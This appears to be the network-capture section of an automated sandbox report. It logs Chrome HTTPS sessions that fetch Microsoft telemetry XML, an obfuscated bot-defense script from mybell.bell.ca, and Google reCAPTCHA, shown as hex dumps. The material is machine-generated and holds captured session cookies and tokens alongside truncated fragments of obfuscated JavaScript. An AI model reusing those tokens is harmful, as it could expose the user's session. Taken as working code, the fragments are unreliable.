                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131209Z-16849878b78tg5n42kspfr0x4800000009n0000000007pz2
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      110192.168.2.949896206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2928OUTGET /static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC1761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 322753
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, immutable
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab200053aa5ccfe5e832db45475ef295985a3d4fc15b396b763391ffb89da57ba1b6090837cb0aaa11300089b08d2df57e2fd010033ec317cfbfcf62fe15bed26fbe78c923dda43bf22d36fef085c13810cee06027e5f1b2e39512; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC14623INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 43 28 66 62 2c 66 64 2c 67 2c 68 29 7b 76 61 72 20 66 45 3d 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 2c 66 69 3d 54 79 70 65 45 72 72 6f 72 2c 66 6e 3d 4f 62 6a 65 63 74 2c 66 4a 3d 52 65 67 45 78 70 2c 66 72 3d 4e 75 6d 62 65 72 2c 66 4b 3d 53 74 72 69 6e 67 2c 66 4e 3d 41 72 72 61 79 2c 66 6b 3d 66 6e 2e 62 69 6e 64 2c 66 47 3d 66 6e 2e 63 61 6c 6c 2c 66 74 3d 66 47 2e 62 69 6e 64 28 66 6b 2c 66 47 29 2c 4f 3d 66 6e 2e 61 70 70 6c 79 2c 66 55 3d 66 74 28 4f 29 2c 73 3d 5b 5d 2e 70 75 73 68 2c 50 3d 5b 5d 2e 70 6f 70 2c 6a 3d 5b 5d 2e 73 6c 69 63 65 2c 4d 3d 5b 5d 2e 73 70 6c 69 63 65 2c 6d 3d 5b 5d 2e 6a 6f 69 6e 2c 52 3d 5b 5d 2e 6d 61 70 2c 76 3d 66 74 28 73 29 2c 4e 3d 66 74 28 6a 29 2c 5a 3d 66 74 28 6d 29 2c 71 3d 66
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function C(fb,fd,g,h){var fE=ReferenceError,fi=TypeError,fn=Object,fJ=RegExp,fr=Number,fK=String,fN=Array,fk=fn.bind,fG=fn.call,ft=fG.bind(fk,fG),O=fn.apply,fU=ft(O),s=[].push,P=[].pop,j=[].slice,M=[].splice,m=[].join,R=[].map,v=ft(s),N=ft(j),Z=ft(m),q=f
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 31 30 50 51 22 2c 22 6a 6f 69 6e 22 2c 22 46 6c 6f 61 74 33 32 41 72 72 61 79 22 2c 22 70 75 73 68 22 2c 22 66 4b 36 6c 5a 44 4b 61 63 67 22 2c 22 4a 4c 71 64 54 7a 45 22 2c 22 4b 68 38 71 39 62 34 77 36 75 71 35 4a 44 36 69 4f 49 6e 53 75 6b 31 31 22 2c 22 55 4f 33 49 4d 68 37 39 47 67 70 43 73 71 6b 22 2c 22 70 6d 59 2d 6f 66 38 73 73 62 65 77 41 55 62 77 58 73 49 22 2c 22 33 48 68 32 75 74 6c 46 77 6f 79 42 5a 56 5f 50 55 51 22 2c 22 44 73 53 62 22 2c 22 58 75 66 4e 43 31 49 22 2c 22 6a 75 4b 58 54 52 71 73 55 54 45 72 6b 76 70 7a 22 2c 22 71 52 74 39 76 73 4d 22 2c 22 4d 51 77 34 75 4b 67 50 6d 65 54 4c 59 58 69 49 59 70 48 6d 68 55 55 48 30 72 62 35 74 54 5a 46 52 53 4c 72 4a 2d 49 62 6f 51 54 73 74 49 55 22 2c 22 4a 4b 33 56 4b 45 32 36 4f 58 39 78
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 10PQ","join","Float32Array","push","fK6lZDKacg","JLqdTzE","Kh8q9b4w6uq5JD6iOInSuk11","UO3IMh79GgpCsqk","pmY-of8ssbewAUbwXsI","3Hh2utlFwoyBZV_PUQ","DsSb","XufNC1I","juKXTRqsUTErkvpz","qRt9vsM","MQw4uKgPmeTLYXiIYpHmhUUH0rb5tTZFRSLrJ-IboQTstIU","JK3VKE26OX9x
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 73 53 33 31 4c 43 68 65 6b 5f 6f 61 44 31 37 76 4a 66 4b 72 2d 39 79 31 34 65 30 4d 53 75 34 5a 36 6e 74 77 35 41 73 54 39 6f 65 51 73 37 55 67 6a 53 72 69 52 62 76 74 34 22 2c 22 58 37 58 55 4e 6c 6f 22 2c 22 6e 72 7a 56 50 48 69 68 49 6c 6b 22 2c 22 57 49 69 79 4d 51 47 51 4b 67 42 5a 77 38 30 48 36 67 22 2c 22 46 55 63 71 6f 61 45 43 22 2c 22 33 31 4a 73 73 66 70 59 6c 35 48 5a 56 57 58 4f 55 4f 53 55 33 53 67 46 69 41 22 2c 22 5f 6c 4d 44 79 49 39 33 22 2c 22 63 61 6c 6c 22 2c 22 71 31 39 67 36 73 34 22 2c 22 6c 58 68 61 6b 39 59 56 30 77 22 2c 22 6d 4f 48 44 62 52 7a 74 4f 42 52 68 73 76 38 73 76 33 45 33 66 75 76 7a 65 41 6f 52 65 34 36 56 22 2c 22 63 32 67 2d 79 62 34 54 79 2d 53 57 62 30 49 22 2c 22 49 71 48 2d 4d 56 5f 6b 44 48 52 42 69 72 74 7a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: sS31LChek_oaD17vJfKr-9y14e0MSu4Z6ntw5AsT9oeQs7UgjSriRbvt4","X7XUNlo","nrzVPHihIlk","WIiyMQGQKgBZw80H6g","FUcqoaEC","31JssfpYl5HZVWXOUOSU3SgFiA","_lMDyI93","call","q19g6s4","lXhak9YV0w","mOHDbRztOBRhsv8sv3E3fuvzeAoRe46V","c2g-yb4Ty-SWb0I","IqH-MV_kDHRBirtz
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 2c 38 33 2c 32 32 30 2c 33 33 33 5d 7d 2c 7b 5a 3a 5b 5d 2c 66 3a 5b 30 2c 31 2c 32 2c 33 2c 34 2c 35 2c 36 5d 2c 6a 3a 5b 31 31 2c 32 35 2c 33 30 2c 34 31 2c 34 32 2c 35 31 2c 35 35 2c 37 30 2c 38 33 2c 31 32 32 2c 31 37 31 2c 32 33 34 2c 33 33 33 2c 33 33 37 5d 7d 2c 7b 5a 3a 5b 5d 2c 66 3a 5b 30 5d 2c 6a 3a 5b 38 34 2c 32 37 33 2c 32 37 35 5d 7d 2c 7b 5a 3a 5b 5d 2c 66 3a 5b 5d 2c 6a 3a 5b 30 2c 31 5d 7d 2c 7b 5a 3a 5b 39 5d 2c 66 3a 5b 30 2c 31 2c 32 2c 33 2c 34 2c 35 2c 36 2c 37 2c 38 2c 39 2c 31 30 5d 2c 6a 3a 5b 32 39 2c 33 37 2c 38 35 2c 31 30 33 2c 31 30 37 2c 32 30 38 2c 32 32 33 2c 32 36 39 2c 32 38 37 2c 33 32 31 2c 33 37 32 5d 7d 2c 7b 5a 3a 5b 5d 2c 66 3a 5b 32 5d 2c 6a 3a 5b 30 2c 31 2c 34 2c 36 5d 7d 2c 7b 5a 3a 5b 31 36 2c 34 5d 2c 66 3a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,83,220,333]},{Z:[],f:[0,1,2,3,4,5,6],j:[11,25,30,41,42,51,55,70,83,122,171,234,333,337]},{Z:[],f:[0],j:[84,273,275]},{Z:[],f:[],j:[0,1]},{Z:[9],f:[0,1,2,3,4,5,6,7,8,9,10],j:[29,37,85,103,107,208,223,269,287,321,372]},{Z:[],f:[2],j:[0,1,4,6]},{Z:[16,4],f:
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC1334INData Raw: 35 2c 36 2c 32 34 2c 32 38 2c 32 31 2c 31 35 5d 2c 66 3a 5b 30 2c 31 2c 32 2c 33 2c 34 2c 35 2c 36 2c 37 2c 38 2c 31 31 2c 31 32 2c 31 33 2c 31 34 2c 31 35 2c 31 36 2c 31 38 2c 31 39 2c 32 30 2c 32 31 2c 32 32 2c 32 33 2c 32 34 2c 32 35 2c 32 36 2c 32 37 2c 32 38 2c 32 39 2c 33 30 2c 33 31 2c 33 32 2c 33 33 2c 33 34 2c 33 35 2c 33 36 2c 33 37 2c 33 38 2c 33 39 2c 34 30 2c 34 31 2c 34 32 2c 34 34 5d 2c 6a 3a 5b 39 2c 31 30 2c 31 37 2c 34 33 2c 34 38 2c 35 36 2c 36 33 2c 37 31 2c 38 33 2c 39 39 2c 31 30 32 2c 31 30 36 2c 31 32 30 2c 32 30 32 2c 32 31 33 2c 32 32 30 2c 32 32 38 2c 32 37 39 2c 32 38 30 2c 32 39 31 2c 33 31 33 2c 33 33 33 2c 33 35 37 2c 33 36 37 2c 33 37 34 2c 33 38 34 5d 7d 2c 7b 5a 3a 5b 35 2c 34 5d 2c 66 3a 5b 30 2c 33 2c 34 2c 35 5d 2c 6a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5,6,24,28,21,15],f:[0,1,2,3,4,5,6,7,8,11,12,13,14,15,16,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,44],j:[9,10,17,43,48,56,63,71,83,99,102,106,120,202,213,220,228,279,280,291,313,333,357,367,374,384]},{Z:[5,4],f:[0,3,4,5],j
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 35 2c 31 38 36 2c 31 38 37 2c 31 38 38 2c 31 38 39 2c 31 39 30 2c 31 39 31 2c 31 39 32 2c 31 39 33 2c 31 39 34 2c 31 39 35 2c 31 39 36 2c 31 39 37 2c 31 39 38 2c 31 39 39 2c 32 30 30 2c 32 30 31 2c 32 30 32 2c 32 30 33 2c 32 30 34 2c 32 30 35 2c 32 30 36 2c 32 30 37 2c 32 30 38 2c 32 30 39 2c 32 31 30 2c 32 31 31 2c 32 31 32 2c 32 31 33 2c 32 31 34 2c 32 31 35 2c 32 31 36 2c 32 31 37 2c 32 31 38 2c 32 31 39 2c 32 32 30 2c 32 32 31 2c 32 32 32 2c 32 32 33 2c 32 32 34 2c 32 32 35 2c 32 32 36 2c 32 32 37 2c 32 32 38 2c 32 32 39 2c 32 33 30 2c 32 33 31 2c 32 33 32 2c 32 33 33 2c 32 33 34 2c 32 33 35 2c 32 33 36 2c 32 33 37 2c 32 33 38 2c 32 33 39 2c 32 34 30 2c 32 34 31 2c 32 34 32 2c 32 34 33 2c 32 34 34 2c 32 34 35 2c 32 34 36 2c 32 34 37 2c 32 34 38 2c 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 20 54 3d 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 3b 64 2e 76 72 5b 54 5d 3d 62 3b 64 2e 76 72 5b 54 2b 31 5d 3d 62 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 54 2c 66 29 7b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32 5d 3b 76 61 72 20 56 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 3b 76 61 72 20 43 3d 6c 3b 76 61 72 20 6f 3d 43 28 56 29 3b 64 2e 6c 2e 76 42 28 47 2c 6f 29 3b 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32 5d 3d 64 2e 6c 2e 49 28 46 29 3b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 3d 31 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 54 20 69 6e 20 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: T=d.vr.length-1;d.vr[T]=b;d.vr[T+1]=b},function(d,T,f){var G=T;var F=f;var l=d.vr[d.vr.length-2];var V=d.vr[d.vr.length-1];var C=l;var o=C(V);d.l.vB(G,o);d.vr[d.vr.length-2]=d.l.I(F);d.vr.length-=1},function(d){var f=[];for(var T in d.vr[d.vr.length-1]){
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 3b 66 2e 76 72 5b 66 2e 76 72 2e 6c 65 6e 67 74 68 5d 3d 66 2e 6c 2e 49 28 64 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 43 2c 54 2c 66 29 7b 76 61 72 20 6b 3d 43 3b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 2e 6c 2e 76 42 28 6b 2c 6c 29 3b 76 61 72 20 56 3d 64 2e 6c 2e 49 28 47 29 3b 76 61 72 20 62 3d 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 3b 64 2e 76 72 5b 62 5d 3d 56 3b 64 2e 76 72 5b 62 2b 31 5d 3d 64 2e 6c 2e 49 28 46 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 54 2c 66 29 7b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6f 3d 64 2e 6c 2e 49 28 46 29 3b 76 61 72 20 62 3d 47 26 6f 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;f.vr[f.vr.length]=f.l.I(d)},function(d,C,T,f){var k=C;var G=T;var F=f;var l=d.vr[d.vr.length-1];d.l.vB(k,l);var V=d.l.I(G);var b=d.vr.length-1;d.vr[b]=V;d.vr[b+1]=d.l.I(F)},function(d,T,f){var G=T;var F=f;var o=d.l.I(F);var b=G&o;var l=d.vr[d.vr.length-2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 5f 30 55 66 70 61 56 59 41 67 46 7a 5f 2d 49 66 4e 74 70 59 41 67 48 4e 48 5f 38 5f 48 43 42 54 6c 42 5f 73 68 57 41 66 65 67 74 79 6c 6c 51 43 42 54 5a 57 4e 67 49 42 49 67 52 6d 48 30 63 4c 54 51 48 69 48 35 65 71 41 4c 30 67 58 51 4c 4a 4a 67 47 63 78 32 35 4e 41 67 66 72 47 38 64 45 4f 77 49 48 48 58 41 71 42 30 50 6c 54 67 49 48 72 67 4b 31 4b 79 6b 31 72 4f 6b 70 41 43 74 78 54 51 46 36 48 2d 73 53 78 32 35 4e 41 67 64 52 54 51 45 57 48 35 51 4f 78 47 35 4e 41 67 66 4f 55 51 48 42 42 54 54 75 79 51 48 69 48 51 49 6e 4c 65 49 45 76 73 6b 77 45 71 74 51 53 51 49 4a 44 41 6c 70 6f 5f 68 71 69 51 45 48 41 52 4a 4e 45 6d 75 70 55 41 49 46 63 77 6b 50 4a 58 47 30 67 41 43 46 41 52 63 57 48 73 52 45 4f 77 49 48 32 57 55 71 41 69 49 63 48 51 70 72 67 31 6b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: _0UfpaVYAgFz_-IfNtpYAgHNH_8_HCBTlB_shWAfegtyllQCBTZWNgIBIgRmH0cLTQHiH5eqAL0gXQLJJgGcx25NAgfrG8dEOwIHHXAqB0PlTgIHrgK1Kyk1rOkpACtxTQF6H-sSx25NAgdRTQEWH5QOxG5NAgfOUQHBBTTuyQHiHQInLeIEvskwEqtQSQIJDAlpo_hqiQEHARJNEmupUAIFcwkPJXG0gACFARcWHsREOwIH2WUqAiIcHQprg1k
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC16384INData Raw: 61 31 78 56 41 67 64 36 47 65 73 79 78 37 6c 54 41 67 55 67 42 41 57 6a 38 67 4f 6c 5f 55 63 43 41 67 31 63 63 6d 6c 56 41 67 58 42 41 38 63 54 56 41 49 4a 36 32 69 5a 76 51 4f 6f 44 4a 55 41 77 51 57 31 56 38 54 45 49 51 46 58 4a 77 50 47 6c 41 4f 55 63 4d 54 48 56 77 49 48 32 53 68 5a 42 5a 46 36 63 48 4b 57 56 67 49 46 56 67 57 50 4b 46 6d 72 43 49 68 70 71 30 42 56 41 67 4a 6b 41 78 52 79 5a 30 32 38 67 31 6b 43 42 53 78 4e 43 33 52 6e 64 4a 34 44 46 6d 37 45 65 6c 6b 43 42 63 58 62 64 51 41 63 55 38 64 58 41 67 65 53 35 57 45 43 53 39 31 58 47 5a 52 77 78 4d 64 58 41 67 66 5a 62 31 6b 49 6b 58 70 77 63 6e 68 57 41 67 6c 4c 33 53 37 45 50 46 63 43 41 73 30 47 69 67 69 49 5a 61 75 52 56 67 49 42 5a 41 50 6a 50 51 46 30 41 47 33 48 59 31 6b 43 42 65 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: a1xVAgd6Gesyx7lTAgUgBAWj8gOl_UcCAg1ccmlVAgXBA8cTVAIJ62iZvQOoDJUAwQW1V8TEIQFXJwPGlAOUcMTHVwIH2ShZBZF6cHKWVgIFVgWPKFmrCIhpq0BVAgJkAxRyZ028g1kCBSxNC3RndJ4DFm7EelkCBcXbdQAcU8dXAgeS5WECS91XGZRwxMdXAgfZb1kIkXpwcnhWAglL3S7EPFcCAs0GigiIZauRVgIBZAPjPQF0AG3HY1kCBet


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      111192.168.2.949892142.250.185.1644433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC536OUTGET /recaptcha/enterprise.js?onload=getCaptchaEnterprise&hl=en&render=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC629INData Raw: 36 39 30 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 45 3d 27 65 6e 74 65 72 70 72 69 73 65 27 2c 61 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 2c 67 72 3d 61 5b 45 5d 3d 61 5b 45 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 690/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['_
